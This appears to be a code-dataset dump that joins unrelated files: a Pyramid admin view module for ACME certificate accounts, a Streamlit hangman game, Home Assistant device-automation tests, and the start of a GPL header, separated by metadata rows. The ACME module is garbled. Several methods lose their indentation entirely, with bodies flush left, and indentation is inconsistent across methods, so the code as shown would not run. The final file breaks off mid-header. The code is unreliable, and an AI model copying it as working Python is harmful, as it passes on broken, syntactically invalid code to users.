    def _focus__authenticate__submit(self):
        """POST handler: authenticate the focused account against its ACME server."""
        dbAcmeAccount = self._focus()
        # result is either: `new-account` or `existing-account`
        # failing will raise an exception
        try:
            authenticatedUser = lib_db.actions_acme.do__AcmeAccount_AcmeV2_authenticate(
                self.request.api_context, dbAcmeAccount
            )
        except errors.AcmeServerError as exc:
            # a 403 "deactivated" response marks the account locally and is
            # swallowed; any other server error propagates
            if not self._handle_potentially_deactivated(exc):
                raise
        if self.request.wants_json:
            return {"AcmeAccount": dbAcmeAccount.as_json}
        return HTTPSeeOther(
            "%s?result=success&operation=acme-server--authenticate&is_authenticated=%s"
            % (self._focus_url, True)
        )
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_server:check",
        renderer=None,
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_server:check|json",
        renderer="json",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-server/check.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. ACME Server - Check""",
            "summary": """Check the key against the provider's new-reg endpoint""",
            "POST": True,
            "GET": None,
            "instructions": [
                """curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/check.json""",
            ],
        }
    )
    def focus__acme_server_check(self):
        """
        this just hits the api, hoping we check correctly.

        Accounts that cannot authenticate get an error response/redirect;
        otherwise POST dispatches to submit, anything else to print.
        """
        dbAcmeAccount = self._focus()
        if not dbAcmeAccount.is_can_authenticate:
            error_message = "This AcmeAccount can not Check"
            if self.request.wants_json:
                return {
                    "error": error_message,
                }
            url_error = "%s?result=error&error=%s&operation=acme-server--check" % (
                self._focus_url,
                error_message.replace(" ", "+"),
            )
            return HTTPSeeOther(url_error)
        if self.request.method == "POST":
            return self._focus__check__submit()
        return self._focus__check__print()
def _focus__check__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/{ID}/acme-server/check.json")
url_post_required = (
"%s?result=error&error=post+required&operation=acme-server--check"
% (self._focus_url,)
)
return HTTPSeeOther(url_post_required)
    def _focus__check__submit(self):
        """POST handler: check whether the account key exists on the ACME server.

        Uses `onlyReturnExisting` so the server reports existence without
        registering.  An `accountDoesNotExist` 400 is reported as result=error;
        any other server error propagates.
        """
        dbAcmeAccount = self._focus()
        # result is either: `existing-account` or ERROR
        # failing will raise an exception
        # passing in `onlyReturnExisting` will log the "check"
        _result = None
        _message = None
        try:
            checkedUser = lib_db.actions_acme.do__AcmeAccount_AcmeV2_authenticate(
                self.request.api_context, dbAcmeAccount, onlyReturnExisting=True
            )
            _result = "success"
        except errors.AcmeServerError as exc:
            # only catch this if `onlyReturnExisting` and there is an DNE error
            if (exc.args[0] == 400) and (
                exc.args[1]["type"] == "urn:ietf:params:acme:error:accountDoesNotExist"
            ):
                _result = "error"
                if "detail" in exc.args[1]:
                    _message = exc.args[1]["detail"]
            else:
                raise
        if self.request.wants_json:
            return {
                "AcmeAccount": dbAcmeAccount.as_json,
                "is_checked": True,
                "result": _result,
                "message": _message,
            }
        _message = quote_plus(_message) if _message else ""
        # NOTE(review): the redirect carries `result=` twice (a fixed
        # "success" and the actual `_result`) — confirm which one the
        # receiving page reads.
        return HTTPSeeOther(
            "%s?result=success&operation=acme-server--check&is_checked=%s&result=%s&message=%s"
            % (self._focus_url, True, _result, _message)
        )
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(route_name="admin:acme_account:focus:mark", renderer=None)
    @view_config(route_name="admin:acme_account:focus:mark|json", renderer="json")
    @docify(
        {
            "endpoint": "/acme-account/{ID}/mark.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. Mark""",
            "POST": True,
            "GET": None,
            "example": "curl --form 'action=active' {ADMIN_PREFIX}/acme-account/1/mark.json",
            "form_fields": {"action": "the intended action"},
            "valid_options": {"action": ["global_default", "active", "inactive"]},
        }
    )
    def focus_mark(self):
        """Mark the focused AcmeAccount: POST submits, anything else prints docs."""
        dbAcmeAccount = self._focus()
        if self.request.method == "POST":
            return self._focus_mark__submit()
        return self._focus_mark__print()
def _focus_mark__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/{ID}/mark.json")
url_post_required = "%s?result=error&error=post+required&operation=mark" % (
self._focus_url
)
return HTTPSeeOther(url_post_required)
    def _focus_mark__submit(self):
        """POST handler: mark the account active / inactive / global_default.

        Applies the transition, flushes the session, and logs an
        `AcmeAccount__mark` OperationsEvent (plus a secondary event when
        setting the global default displaces another account).  Invalid
        transitions become form errors; failures redirect with the error.
        """
        dbAcmeAccount = self._focus()
        action = self.request.params.get("action")
        try:
            (result, formStash) = formhandling.form_validate(
                self.request,
                schema=Form_AcmeAccount_mark,
                validate_get=False,
                # validate_post=False
            )
            if not result:
                raise formhandling.FormInvalid()
            action = formStash.results["action"]
            event_type = model_utils.OperationsEventType.from_string(
                "AcmeAccount__mark"
            )
            event_payload_dict = utils.new_event_payload_dict()
            event_payload_dict["acme_account_id"] = dbAcmeAccount.id
            event_payload_dict["action"] = formStash.results["action"]
            event_status = False
            event_alt = None
            try:
                if action == "active":
                    event_status = lib_db.update.update_AcmeAccount__set_active(
                        self.request.api_context, dbAcmeAccount
                    )
                elif action == "inactive":
                    event_status = lib_db.update.update_AcmeAccount__unset_active(
                        self.request.api_context, dbAcmeAccount
                    )
                elif action == "global_default":
                    (
                        event_status,
                        alt_info,
                    ) = lib_db.update.update_AcmeAccount__set_global_default(
                        self.request.api_context, dbAcmeAccount
                    )
                    if alt_info:
                        # merge the displaced account's payload and remember
                        # the secondary (status, account) for logging below
                        for (k, v) in alt_info["event_payload_dict"].items():
                            event_payload_dict[k] = v
                        event_alt = alt_info["event_alt"]
                else:
                    raise errors.InvalidTransition("Invalid option")
            except errors.InvalidTransition as exc:
                # `formStash.fatal_form(` will raise a `FormInvalid()`
                formStash.fatal_form(message=exc.args[0])
            self.request.api_context.dbSession.flush(objects=[dbAcmeAccount])
            # bookkeeping
            dbOperationsEvent = lib_db.logger.log__OperationsEvent(
                self.request.api_context, event_type, event_payload_dict
            )
            lib_db.logger._log_object_event(
                self.request.api_context,
                dbOperationsEvent=dbOperationsEvent,
                event_status_id=model_utils.OperationsObjectEventStatus.from_string(
                    event_status
                ),
                dbAcmeAccount=dbAcmeAccount,
            )
            if event_alt:
                # event_alt = (status_string, displaced AcmeAccount)
                lib_db.logger._log_object_event(
                    self.request.api_context,
                    dbOperationsEvent=dbOperationsEvent,
                    event_status_id=model_utils.OperationsObjectEventStatus.from_string(
                        event_alt[0]
                    ),
                    dbAcmeAccount=event_alt[1],
                )
            if self.request.wants_json:
                return {"result": "success", "AcmeAccount": dbAcmeAccount.as_json}
            url_success = "%s?result=success&operation=mark&action=%s" % (
                self._focus_url,
                action,
            )
            return HTTPSeeOther(url_success)
        except formhandling.FormInvalid as exc:  # noqa: F841
            if self.request.wants_json:
                return {"result": "error", "form_errors": formStash.errors}
            url_failure = "%s?result=error&error=%s&operation=mark&action=%s" % (
                self._focus_url,
                errors.formstash_to_querystring(formStash),
                action,
            )
            raise HTTPSeeOther(url_failure)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_server:deactivate_pending_authorizations",
        renderer=None,
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_server:deactivate_pending_authorizations|json",
        renderer="json",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-server/deactivate-pending-authorizations.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. ACME Server - Deactivate Pending Authorizations""",
            "summary": """deactivate pending authorizations on the acme server, must supply the authorization_ids""",
            "POST": True,
            "GET": None,
            "instructions": [
                """curl --form 'acme_authorization_id=1' --form 'acme_authorization_id=2' {ADMIN_PREFIX}/acme-account/1/acme-server/deactivate-pending-authorizations.json""",
            ],
            "form_fields": {
                "authorization_id": "the pending authorization id to delete ",
            },
        }
    )
    def focus__acme_server_deactivate_pending_authorizations(self):
        """
        this just hits the api, hoping we authenticate correctly.

        Accounts that cannot authenticate get an error response/redirect;
        otherwise POST dispatches to submit, anything else to print.
        """
        dbAcmeAccount = self._focus()
        if not dbAcmeAccount.is_can_authenticate:
            error_message = "This AcmeAccount can not Authenticate"
            if self.request.wants_json:
                return {
                    "error": error_message,
                }
            url_error = "%s?result=error&error=%s&operation=acme-server--deactivate-pending-authorizations" % (
                self._focus_url,
                error_message.replace(" ", "+"),
            )
            return HTTPSeeOther(url_error)
        if self.request.method == "POST":
            return self._focus__acme_server_deactivate_pending_authorizations__submit()
        return self._focus__acme_server_deactivate_pending_authorizations__print()
def _focus__acme_server_deactivate_pending_authorizations__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(
self,
"/acme-account/{ID}/acme-server/deactivate-pending-authorizations.json",
)
url_post_required = (
"%s/acme-authorizations?status=active&result=error&error=post+required&operation=acme-server--deactivate-pending-authorizations"
% (self._focus_url,)
)
return HTTPSeeOther(url_post_required)
    def _focus__acme_server_deactivate_pending_authorizations__submit(self):
        """POST handler: deactivate the submitted pending authorizations upstream.

        Requires at least one `acme_authorization_id` form value; success and
        failure both redirect back to the account's authorizations listing
        (or return JSON).
        """
        dbAcmeAccount = self._focus()
        try:
            (result, formStash) = formhandling.form_validate(
                self.request,
                schema=Form_AcmeAccount_deactivate_authorizations,
                validate_get=False,
            )
            if not result:
                raise formhandling.FormInvalid()
            if not formStash.results["acme_authorization_id"]:
                # `formStash.fatal_form()` will raise `FormInvalid()`
                formStash.fatal_form(
                    "You must supply at least one `acme_authorization_id` to deactivate."
                )
            results = lib_db.actions_acme.do__AcmeV2_AcmeAccount__acme_server_deactivate_authorizations(
                self.request.api_context,
                dbAcmeAccount=dbAcmeAccount,
                acme_authorization_ids=formStash.results["acme_authorization_id"],
            )
            if self.request.wants_json:
                return {
                    "result": "success",
                    "results": results,
                    "AcmeAccount": dbAcmeAccount.as_json,
                }
            return HTTPSeeOther(
                "%s/acme-authorizations?status=active&result=success&operation=acme-server--deactivate-pending-authorizations"
                % (self._focus_url,)
            )
        except formhandling.FormInvalid as exc:  # noqa: F841
            if self.request.wants_json:
                return {"result": "error", "form_errors": formStash.errors}
            return HTTPSeeOther(
                "%s/acme-authorizations?status=active&result=error&error=%s&operation=acme-server--deactivate-pending-authorizations"
                % (
                    self._focus_url,
                    errors.formstash_to_querystring(formStash),
                )
            )
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_server:deactivate",
        renderer=None,
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_server:deactivate|json",
        renderer="json",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-server/deactivate.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. ACME Server - Deactivate""",
            "POST": True,
            "GET": None,
            "form_fields": {
                "key_pem": "the active key as md5(PEM) or PEM",
            },
            "instructions": [
                """curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/deactivate.json""",
            ],
        }
    )
    def focus__acme_server_deactivate(self):
        """
        this just hits the api, hoping we authenticate correctly.

        Accounts that cannot be deactivated get an error response/redirect;
        otherwise POST dispatches to submit, anything else to print.
        """
        dbAcmeAccount = self._focus()
        if not dbAcmeAccount.is_can_deactivate:
            error_message = "This AcmeAccount can not be deactivated"
            if self.request.wants_json:
                return {
                    "error": error_message,
                }
            url_error = "%s?result=error&error=%s&operation=acme-server--deactivate" % (
                self._focus_url,
                error_message.replace(" ", "+"),
            )
            return HTTPSeeOther(url_error)
        if self.request.method == "POST":
            return self._focus__acme_server_deactivate__submit()
        return self._focus__acme_server_deactivate__print()
def _focus__acme_server_deactivate__print(self):
    """Render the deactivation form (HTML) or the endpoint docs (JSON)."""
    dbAcmeAccount = self._focus()
    if not self.request.wants_json:
        return render_to_response(
            "/admin/acme_account-focus-deactivate.mako",
            {"AcmeAccount": dbAcmeAccount},
            self.request,
        )
    return formatted_get_docs(self, "/acme-account/{ID}/acme-server/deactivate.json")
def _focus__acme_server_deactivate__submit(self):
    """Handle POST: deactivate this AcmeAccount on the ACME server.

    The submitted `key_pem` must match the active account key, either as
    an md5 digest or as the full PEM.  Server errors are re-raised unless
    the account turns out to already be deactivated, in which case the
    error surfaces as a form error.
    """
    dbAcmeAccount = self._focus()
    try:
        (result, formStash) = formhandling.form_validate(
            self.request,
            schema=Form_AcmeAccount_deactivate,
            validate_get=False,
        )
        if not result:
            raise formhandling.FormInvalid()
        # `key_pem` can match the full or md5
        _key_pem = formStash.results["key_pem"]
        if _key_pem != dbAcmeAccount.acme_account_key.key_pem_md5:
            # normalize the PEM before comparing against the stored key
            _key_pem = cert_utils.cleanup_pem_text(_key_pem)
            if _key_pem != dbAcmeAccount.acme_account_key.key_pem:
                formStash.fatal_field(
                    field="key_pem",
                    message="This does not match the active account key",
                )
        try:
            results = lib_db.actions_acme.do__AcmeV2_AcmeAccount__deactivate(
                self.request.api_context,
                dbAcmeAccount=dbAcmeAccount,
                transaction_commit=True,
            )
        except errors.AcmeServerError as exc:
            # if the server says it is already deactivated, treat as form error
            if self._handle_potentially_deactivated(exc):
                formStash.fatal_form(message=str(exc.args[1]))
            raise
        if self.request.wants_json:
            return {
                "result": "success",
                "AcmeAccount": dbAcmeAccount.as_json,
            }
        return HTTPSeeOther(
            "%s?result=success&operation=acme-server--deactivate"
            % (self._focus_url,)
        )
    except formhandling.FormInvalid as exc:  # noqa: F841
        if self.request.wants_json:
            return {"result": "error", "form_errors": formStash.errors}
        return formhandling.form_reprint(
            self.request, self._focus__acme_server_deactivate__print
        )
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
    route_name="admin:acme_account:focus:acme_server:key_change",
    renderer=None,
)
@view_config(
    route_name="admin:acme_account:focus:acme_server:key_change|json",
    renderer="json",
)
@docify(
    {
        "endpoint": "/acme-account/{ID}/acme-server/key-change.json",
        "section": "acme-account",
        "about": """AcmeAccount: Focus. ACME Server - KeyChange""",
        "POST": True,
        "GET": None,
        "instructions": [
            """curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/key-change.json""",
        ],
        "form_fields": {
            "key_pem_existing": "the active key as md5(PEM) or PEM",
        },
    }
)
def focus__acme_server_key_change(self):
    """
    Dispatch for rolling this AcmeAccount's key on the ACME server.

    this just hits the api, hoping we authenticate correctly.
    """
    dbAcmeAccount = self._focus()
    # FIX: check the guard BEFORE dispatching on method; previously a POST
    # skipped `is_can_key_change` entirely, allowing key-change on accounts
    # that should refuse it.  This mirrors `focus__acme_server_deactivate`.
    if not dbAcmeAccount.is_can_key_change:
        error_message = "This AcmeAccount can not be key changed"
        if self.request.wants_json:
            return {
                "error": error_message,
            }
        url_error = "%s?result=error&error=%s&operation=acme-server--key-change" % (
            self._focus_url,
            error_message.replace(" ", "+"),
        )
        return HTTPSeeOther(url_error)
    if self.request.method == "POST":
        return self._focus__acme_server_key_change__submit()
    return self._focus__acme_server_key_change__print()
def _focus__acme_server_key_change__print(self):
    """Render the key-change form (HTML) or the endpoint docs (JSON)."""
    dbAcmeAccount = self._focus()
    if not self.request.wants_json:
        return render_to_response(
            "/admin/acme_account-focus-key_change.mako",
            {"AcmeAccount": dbAcmeAccount},
            self.request,
        )
    return formatted_get_docs(self, "/acme-account/{ID}/acme-server/key-change.json")
def _focus__acme_server_key_change__submit(self):
    """Handle POST: perform an ACME key-change for this account.

    The submitted `key_pem_existing` must match the active account key
    (md5 digest or full PEM).  `key_pem_new=None` lets the backend
    generate the replacement key.
    """
    dbAcmeAccount = self._focus()
    try:
        (result, formStash) = formhandling.form_validate(
            self.request,
            schema=Form_AcmeAccount_key_change,
            validate_get=False,
        )
        if not result:
            raise formhandling.FormInvalid()
        # `key_pem` can match the full or md5
        _key_pem_old = formStash.results["key_pem_existing"]
        if _key_pem_old != dbAcmeAccount.acme_account_key.key_pem_md5:
            _key_pem_old = cert_utils.cleanup_pem_text(_key_pem_old)
            if _key_pem_old != dbAcmeAccount.acme_account_key.key_pem:
                formStash.fatal_field(
                    field="key_pem_existing",
                    message="This does not match the active account key",
                )
        try:
            results = lib_db.actions_acme.do__AcmeV2_AcmeAccount__key_change(
                self.request.api_context,
                dbAcmeAccount=dbAcmeAccount,
                key_pem_new=None,
                transaction_commit=True,
            )
        except errors.ConflictingObject as exc:
            # args[0] = tuple(conflicting_object, error_message_string)
            formStash.fatal_form(message=str(exc.args[0][1]))
        if self.request.wants_json:
            return {
                "result": "success",
                "AcmeAccount": dbAcmeAccount.as_json,
            }
        # NOTE(review): "?&result=..." contains a stray '&' after '?' —
        # harmless to parsers, but likely unintentional; left as-is.
        return HTTPSeeOther(
            "%s?&result=success&operation=acme-server--key-change"
            % (self._focus_url,)
        )
    except formhandling.FormInvalid as exc:  # noqa: F841
        if self.request.wants_json:
            return {"result": "error", "form_errors": formStash.errors}
        return formhandling.form_reprint(
            self.request, self._focus__acme_server_key_change__print
        )
| 40.498356 | 190 | 0.560408 |
acfa84dfbb827e74204cda16037ad15fe3f31cdc | 5,145 | py | Python | app.py | choudhary-vaibhav/CodingMan | 29d8a75b38d5575b650c37dd6d1d79efd6586a21 | [
"MIT"
] | null | null | null | app.py | choudhary-vaibhav/CodingMan | 29d8a75b38d5575b650c37dd6d1d79efd6586a21 | [
"MIT"
] | null | null | null | app.py | choudhary-vaibhav/CodingMan | 29d8a75b38d5575b650c37dd6d1d79efd6586a21 | [
"MIT"
] | null | null | null | import streamlit as st
st.set_page_config( page_title = "CodingMan")
#for page title
lose = 0 #for tracking wrong inputs
win = 0 #for tracking right inputs
def win_check(letter, text):
    """Update the global win/lose tallies for one guessed letter.

    Shows the streamlit balloons animation once every letter of `text`
    has been guessed.  NOTE(review): assumes all letters of `text` are
    distinct (true for "tuple"); with repeated letters `win` could never
    reach len(text) -- confirm before changing the word.
    """
    global lose
    global win
    if letter not in text:
        lose += 1
    else:
        win += 1
    if win == len(text):
        st.balloons()
def update(letter, word, text):
    """Reveal every occurrence of `letter` in the displayed word.

    `word` is the display string "_ _ _ _ _ " where character 2*i is the
    blank for letter i of `text` (odd positions are spaces).  Renders the
    updated word into the global streamlit placeholder `u` and returns
    the new display string.
    """
    text = list(text)
    word = list(word)
    letter = letter.lower()
    for i in range(len(text)):
        if text[i] == letter:
            # position 2*i maps the i-th letter onto the spaced display
            word[2*i] = letter
    new = ""
    word = new.join(word)
    u.markdown( f"<h1 style='text-align: center; color: red;'>{word}</h1>", unsafe_allow_html=True)
    return word
# --- page layout -----------------------------------------------------------
st.markdown("<h1 style='text-align: center; color: royalblue;'>CodingMan</h1>", unsafe_allow_html=True)
st.markdown("<h3 style='text-align: center; '>Customized Hangman For Python Programmers</h3>", unsafe_allow_html=True)
u = st.empty() # placeholder for displaying the word
col = st.columns(5) # 4 columns for input and 1 column for hangman in desktop version; this site is not responsive
with col[0]:
    t1 = st.container()
with col[1]:
    t2 = st.container()
with col[2]:
    t3 = st.container()
with col[3]:
    t4 = st.container()
with col[4]:
    t5 = st.empty()
# --- game state ------------------------------------------------------------
text = "tuple"           # the secret word
word = "_ _ _ _ _ "      # display string: blanks at even indices
limit = 0  # attempted permissible inputs; set to 4 more than the word length below
count = 1  # counts the inputs made so far
letters = ['', '', '', '', '', '','','','','','','','','',''] # stores the inputs
u.markdown( f"<h1 style='text-align: center; color: red;'>{word}</h1>", unsafe_allow_html=True)
limit = len(text) + 4
t5.image('hangman_pics/pic1.jpeg')
# --- input slots -----------------------------------------------------------
# Each slot is gated on earlier game state; later slots additionally stop
# accepting input once the player has won (win == len(text)), lost
# (lose == 4), or exhausted the attempt limit (count == limit).
letters[0] = t1.text_input(f"Enter a letter:", max_chars = 1, key = 1 )
if letters[0]:
    count += 1
    word = update(letters[0], word, text)
    win_check(letters[0], text)
letters[1] = t2.text_input(f"Enter a letter:", max_chars = 1, key = 2 )
if letters[1]:
    count += 1
    word = update(letters[1], word, text)
    win_check(letters[1], text)
letters[2] = t3.text_input(f"Enter a letter:", max_chars = 1, key = 3 )
if letters[2]:
    count += 1
    word = update(letters[2], word, text)
    win_check(letters[2], text)
letters[3] = t4.text_input(f"Enter a letter:", max_chars = 1, key = 4 )
if letters[3] and (win != len(text)):
    count += 1
    word = update(letters[3], word, text)
    win_check(letters[3], text)
letters[4] = t1.text_input(f"Enter a letter:", max_chars = 1, key = 5 )
if letters[4] and (lose != 4) and (win != len(text)):
    count += 1
    word = update(letters[4], word, text)
    win_check(letters[4], text)
letters[5] = t2.text_input(f"Enter a letter:", max_chars = 1, key = 6 )
if letters[5] and lose != 4 and (win != len(text)):
    count += 1
    word = update(letters[5], word, text)
    win_check(letters[5], text)
letters[6] = t3.text_input(f"Enter a letter:", max_chars = 1, key = 7 )
if letters[6] and count != limit and lose != 4 and (win != len(text)):
    count += 1
    word = update(letters[6], word, text)
    win_check(letters[6], text)
letters[7] = t4.text_input(f"Enter a letter:", max_chars = 1, key = 8 )
if letters[7] and count != limit and lose != 4 and (win != len(text)):
    count += 1
    word = update(letters[7], word, text)
    win_check(letters[7], text)
letters[8] = t2.text_input(f"Enter a letter:", max_chars = 1, key = 9 )
if letters[8] and count != limit and lose != 4 and (win != len(text)):
    count += 1
    word = update(letters[8], word, text)
    win_check(letters[8], text)
letters[9] = t3.text_input(f"Enter a letter:", max_chars = 1, key = 10 )
if letters[9] and count != limit and lose != 4 and (win != len(text)):
    # NOTE(review): unlike every earlier slot, `count` is not incremented
    # here -- possibly an oversight; confirm before relying on `limit`.
    word = update(letters[9], word, text)
    win_check(letters[9], text)
# --- hangman picture reflects the number of wrong guesses ------------------
if lose == 1:
    t5.image('hangman_pics/pic2.jpeg')
elif lose == 2:
    t5.image('hangman_pics/pic3.jpeg')
elif lose == 3:
    t5.image('hangman_pics/pic4.jpeg')
elif lose == 4:
    t5.image('hangman_pics/pic5.jpeg')
| 30.625 | 118 | 0.491934 |
acfa853d596f27307a7f5506c43aedf1c8e7bb64 | 8,146 | py | Python | tests/components/device_automation/test_init.py | kit-klein/home-assistant | 9c49b8dfc1b9723abe77fb7bb975f94b5233ad00 | [
"Apache-2.0"
] | null | null | null | tests/components/device_automation/test_init.py | kit-klein/home-assistant | 9c49b8dfc1b9723abe77fb7bb975f94b5233ad00 | [
"Apache-2.0"
] | 3 | 2018-01-23T20:41:55.000Z | 2018-01-23T20:42:12.000Z | tests/components/device_automation/test_init.py | kit-klein/home-assistant | 9c49b8dfc1b9723abe77fb7bb975f94b5233ad00 | [
"Apache-2.0"
] | null | null | null | """The test for light device automation."""
import pytest
from homeassistant.setup import async_setup_component
import homeassistant.components.automation as automation
from homeassistant.components.websocket_api.const import TYPE_RESULT
from homeassistant.helpers import device_registry
from tests.common import MockConfigEntry, mock_device_registry, mock_registry
@pytest.fixture
def device_reg(hass):
    """Return an empty, loaded, mock device registry."""
    return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass):
    """Return an empty, loaded, mock entity registry."""
    return mock_registry(hass)
def _same_lists(a, b):
if len(a) != len(b):
return False
for d in a:
if d not in b:
return False
return True
async def test_websocket_get_actions(hass, hass_ws_client, device_reg, entity_reg):
    """Test we get the expected actions from a light through websocket."""
    await async_setup_component(hass, "device_automation", {})
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    # register a device and attach a light entity to it
    device_entry = device_reg.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_reg.async_get_or_create("light", "test", "5678", device_id=device_entry.id)
    expected_actions = [
        {
            "domain": "light",
            "type": "turn_off",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
        {
            "domain": "light",
            "type": "turn_on",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
        {
            "domain": "light",
            "type": "toggle",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
    ]
    client = await hass_ws_client(hass)
    await client.send_json(
        {"id": 1, "type": "device_automation/action/list", "device_id": device_entry.id}
    )
    msg = await client.receive_json()

    assert msg["id"] == 1
    assert msg["type"] == TYPE_RESULT
    assert msg["success"]
    actions = msg["result"]
    # order is not guaranteed, so compare as unordered lists
    assert _same_lists(actions, expected_actions)
async def test_websocket_get_conditions(hass, hass_ws_client, device_reg, entity_reg):
    """Test we get the expected conditions from a light through websocket."""
    await async_setup_component(hass, "device_automation", {})
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    # register a device and attach a light entity to it
    device_entry = device_reg.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_reg.async_get_or_create("light", "test", "5678", device_id=device_entry.id)
    expected_conditions = [
        {
            "condition": "device",
            "domain": "light",
            "type": "is_off",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
        {
            "condition": "device",
            "domain": "light",
            "type": "is_on",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
    ]
    client = await hass_ws_client(hass)
    await client.send_json(
        {
            "id": 1,
            "type": "device_automation/condition/list",
            "device_id": device_entry.id,
        }
    )
    msg = await client.receive_json()

    assert msg["id"] == 1
    assert msg["type"] == TYPE_RESULT
    assert msg["success"]
    conditions = msg["result"]
    # order is not guaranteed, so compare as unordered lists
    assert _same_lists(conditions, expected_conditions)
async def test_websocket_get_triggers(hass, hass_ws_client, device_reg, entity_reg):
    """Test we get the expected triggers from a light through websocket."""
    await async_setup_component(hass, "device_automation", {})
    config_entry = MockConfigEntry(domain="test", data={})
    config_entry.add_to_hass(hass)
    # register a device and attach a light entity to it
    device_entry = device_reg.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_reg.async_get_or_create("light", "test", "5678", device_id=device_entry.id)
    expected_triggers = [
        {
            "platform": "device",
            "domain": "light",
            "type": "turned_off",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
        {
            "platform": "device",
            "domain": "light",
            "type": "turned_on",
            "device_id": device_entry.id,
            "entity_id": "light.test_5678",
        },
    ]
    client = await hass_ws_client(hass)
    await client.send_json(
        {
            "id": 1,
            "type": "device_automation/trigger/list",
            "device_id": device_entry.id,
        }
    )
    msg = await client.receive_json()

    assert msg["id"] == 1
    assert msg["type"] == TYPE_RESULT
    assert msg["success"]
    triggers = msg["result"]
    # order is not guaranteed, so compare as unordered lists
    assert _same_lists(triggers, expected_triggers)
async def test_automation_with_non_existing_integration(hass, caplog):
    """Test device automation with non existing integration."""
    # setup succeeds, but the bad trigger domain is logged
    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: {
                "alias": "hello",
                "trigger": {
                    "platform": "device",
                    "device_id": "none",
                    "domain": "beer",
                },
                "action": {"service": "test.automation", "entity_id": "hello.world"},
            }
        },
    )

    assert "Integration 'beer' not found" in caplog.text
async def test_automation_with_integration_without_device_action(hass, caplog):
    """Test automation with integration without device action support."""
    # setup succeeds, but the unsupported device action is logged
    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: {
                "alias": "hello",
                "trigger": {"platform": "event", "event_type": "test_event1"},
                "action": {"device_id": "", "domain": "test"},
            }
        },
    )

    assert (
        "Integration 'test' does not support device automation actions" in caplog.text
    )
async def test_automation_with_integration_without_device_trigger(hass, caplog):
    """Test automation with integration without device trigger support."""
    # setup succeeds, but the unsupported device trigger is logged
    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: {
                "alias": "hello",
                "trigger": {
                    "platform": "device",
                    "device_id": "none",
                    "domain": "test",
                },
                "action": {"service": "test.automation", "entity_id": "hello.world"},
            }
        },
    )

    assert (
        "Integration 'test' does not support device automation triggers" in caplog.text
    )
async def test_automation_with_bad_action(hass, caplog):
    """Test automation with bad device action."""
    # action config is missing required keys; schema error is logged
    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: {
                "alias": "hello",
                "trigger": {"platform": "event", "event_type": "test_event1"},
                "action": {"device_id": "", "domain": "light"},
            }
        },
    )

    assert "required key not provided" in caplog.text
async def test_automation_with_bad_trigger(hass, caplog):
    """Test automation with bad device trigger."""
    # trigger config is missing required keys; schema error is logged
    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: {
                "alias": "hello",
                "trigger": {"platform": "device", "domain": "light"},
                "action": {"service": "test.automation", "entity_id": "hello.world"},
            }
        },
    )

    assert "required key not provided" in caplog.text
acfa861d33f948d1a0a20b06831d2194be46c2ad | 1,131 | py | Python | python/__init__.py | qgua2322/rfnoc-Kwan | be84faffc77246d47062bd9197674e81039ecfdb | [
"MIT"
] | null | null | null | python/__init__.py | qgua2322/rfnoc-Kwan | be84faffc77246d47062bd9197674e81039ecfdb | [
"MIT"
] | null | null | null | python/__init__.py | qgua2322/rfnoc-Kwan | be84faffc77246d47062bd9197674e81039ecfdb | [
"MIT"
] | null | null | null | #
# Copyright 2008,2009 Free Software Foundation, Inc.
#
# This application is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
